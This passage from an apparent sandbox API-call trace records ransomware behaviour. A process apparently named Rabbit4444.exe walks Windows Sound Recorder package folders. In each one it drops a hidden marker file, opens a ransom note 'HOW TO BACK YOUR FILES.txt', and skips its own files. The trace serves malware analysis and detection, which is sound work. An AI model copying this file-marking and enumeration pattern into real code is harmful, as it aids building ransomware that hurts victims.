hHeap=0xe0000) returned 1 [0063.114] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x121fc0 | out: hHeap=0xe0000) returned 1 [0063.114] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\RoamingState" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\RoamingState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\RoamingState" [0063.114] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\RoamingState", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\RoamingState\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\RoamingState\\" [0063.114] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\RoamingState\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\RoamingState\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\RoamingState\\.BFC0E91B00AE8A0620D3" [0063.114] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\RoamingState\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowssoundrecorder_8wekyb3d8bbwe\\roamingstate\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x298 [0063.115] WriteFile (in: hFile=0x298, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0063.120] FlushFileBuffers (hFile=0x298) returned 1 [0063.121] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\RoamingState\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0063.121] CloseHandle (hObject=0x298) returned 1 [0063.122] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\RoamingState") returned 96 [0063.122] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0063.122] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\RoamingState\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x66968cc, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1c1d2d3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xeef1e290, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102410 [0063.122] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.122] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.122] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0063.122] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0063.122] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x66968cc, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1c1d2d3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xeef1e290, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0063.122] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.122] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.122] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0063.122] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0063.122] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0063.122] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeef1e290, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeef1e290, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeef1e290, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0063.122] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.123] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0063.123] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeef1e290, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeef1e290, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeef1e290, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0063.123] FindClose (in: hFindFile=0x102410 | out: hFindFile=0x102410) returned 1 [0063.123] lstrcpyW (in: lpString1=0x130ebfa, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0063.123] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\RoamingState\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowssoundrecorder_8wekyb3d8bbwe\\roamingstate\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0063.123] CreateFileMappingW (hFile=0x298, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0063.123] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0063.124] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0063.124] CloseHandle (hObject=0x2a0) returned 1 [0063.124] CloseHandle (hObject=0x298) returned 1 [0063.124] GetCurrentThreadId () returned 0xd98 [0063.124] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122048 [0063.124] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\LocalState", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\LocalState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\LocalState" [0063.124] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e388 | out: hHeap=0xe0000) returned 1 [0063.124] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122040 | out: hHeap=0xe0000) returned 1 [0063.124] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\LocalState" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\LocalState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\LocalState" [0063.124] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\LocalState", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\LocalState\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\LocalState\\" [0063.124] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\LocalState\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\LocalState\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\LocalState\\.BFC0E91B00AE8A0620D3" [0063.124] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\LocalState\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowssoundrecorder_8wekyb3d8bbwe\\localstate\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x298 [0063.125] WriteFile (in: hFile=0x298, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0063.128] FlushFileBuffers (hFile=0x298) returned 1 [0063.129] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\LocalState\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0063.129] CloseHandle (hObject=0x298) returned 1 [0063.130] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\LocalState") returned 94 [0063.130] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0063.130] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\LocalState\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6670683, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1c1cea1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xeef1e290, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a90 [0063.130] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.130] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.130] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0063.130] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0063.130] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6670683, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1c1cea1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xeef1e290, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0063.130] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.130] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.130] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0063.130] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0063.130] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0063.130] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeef1e290, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeef1e290, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeef444aa, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0063.130] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.130] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0063.130] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeef1e290, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeef1e290, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeef444aa, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0063.131] FindClose (in: hFindFile=0x102a90 | out: hFindFile=0x102a90) returned 1 [0063.131] lstrcpyW (in: lpString1=0x130ebf6, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0063.131] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\LocalState\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowssoundrecorder_8wekyb3d8bbwe\\localstate\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0063.131] CreateFileMappingW (hFile=0x298, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0063.131] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0063.131] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0063.132] CloseHandle (hObject=0x2a0) returned 1 [0063.132] CloseHandle (hObject=0x298) returned 1 [0063.132] GetCurrentThreadId () returned 0xd98 [0063.132] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122248 [0063.132] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\LocalCache", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\LocalCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\LocalCache" [0063.132] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e2c0 | out: hHeap=0xe0000) returned 1 [0063.132] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122240 | out: hHeap=0xe0000) returned 1 [0063.132] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\LocalCache" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\LocalCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\LocalCache" [0063.132] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\LocalCache", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\LocalCache\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\LocalCache\\" [0063.132] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\LocalCache\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\LocalCache\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\LocalCache\\.BFC0E91B00AE8A0620D3" [0063.132] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\LocalCache\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowssoundrecorder_8wekyb3d8bbwe\\localcache\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x298 [0063.134] WriteFile (in: hFile=0x298, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0063.136] FlushFileBuffers (hFile=0x298) returned 1 [0063.137] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\LocalCache\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0063.138] CloseHandle (hObject=0x298) returned 1 [0063.138] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\LocalCache") returned 94 [0063.138] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0063.138] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\LocalCache\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x66bcb41, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1c1cab3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xeef444aa, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1027d0 [0063.138] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.138] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.138] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0063.138] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0063.138] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x66bcb41, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1c1cab3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xeef444aa, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0063.138] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.138] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.139] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0063.139] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0063.139] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0063.139] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeef444aa, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeef444aa, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeef444aa, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0063.139] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.139] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0063.139] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeef444aa, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeef444aa, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeef444aa, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0063.139] FindClose (in: hFindFile=0x1027d0 | out: hFindFile=0x1027d0) returned 1 [0063.140] lstrcpyW (in: lpString1=0x130ebf6, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0063.140] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\LocalCache\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowssoundrecorder_8wekyb3d8bbwe\\localcache\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0063.141] CreateFileMappingW (hFile=0x298, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0063.141] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0063.141] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0063.141] CloseHandle (hObject=0x2a0) returned 1 [0063.141] CloseHandle (hObject=0x298) returned 1 [0063.141] GetCurrentThreadId () returned 0xd98 [0063.141] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122228 [0063.141] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AppData", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AppData" [0063.141] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123080 | out: hHeap=0xe0000) returned 1 [0063.141] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122220 | out: hHeap=0xe0000) returned 1 [0063.142] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AppData" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AppData" [0063.142] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AppData", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AppData\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AppData\\" [0063.142] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AppData\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AppData\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AppData\\.BFC0E91B00AE8A0620D3" [0063.142] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AppData\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowssoundrecorder_8wekyb3d8bbwe\\appdata\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x298 [0063.143] WriteFile (in: hFile=0x298, lpBuffer=0x1008b4*, 